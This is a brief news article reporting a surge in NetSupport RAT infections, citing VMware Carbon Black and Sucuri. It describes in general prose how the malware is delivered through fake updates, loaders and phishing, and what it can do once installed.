Surge in NetSupport RAT Malware Cases
Business

Surge in NetSupport RAT Malware Cases

Editor

NetSupport RAT, a remote access trojan, is being targeted by threat actors in the education, government, and business services sectors. This malware is being delivered through fraudulent updates, drive-by downloads, utilization of malware loaders (such as GHOSTPULSE), and various forms of phishing campaigns.

VMware Carbon Black researchers have reported detecting at least 15 new infections related to NetSupport RAT in the last few weeks. The cybersecurity firm has also detailed how NetSupport Manager, which originally served as a legitimate remote administration tool for technical assistance and support, has been misappropriated by malicious actors for their own advantage.

In August 2022, Sucuri revealed a campaign in which compromised WordPress sites were being used to display fraudulent Cloudflare DDoS protection pages that led to the distribution of NetSupport RAT. The use of bogus web browser updates is a tactic often associated with the deployment of a JavaScript-based downloader malware known as SocGholish (aka FakeUpdates), which has also been observed propagating a loader malware codenamed BLISTER.

The JavaScript payload subsequently invokes PowerShell to connect to a remote server and retrieve a ZIP archive file containing NetSupport RAT that, upon installation, beacons out to a command-and-control (C2) server. Once installed on a victim’s device, NetSupport is able to monitor behavior, transfer files, manipulate computer settings, and move to other devices within the network.

If you found this article interesting

Leave a Reply

Berlin Police Buildings Renovation Plans Met with Ambiguity and Concern Previous post Berlin Police Buildings Renovation Plans Met with Ambiguity and Concern
Sato Housing Investment Company Announces Share Issue to Enhance Equity Ratio Next post Sato Housing Investment Company Announces Share Issue to Enhance Equity Ratio

More Stories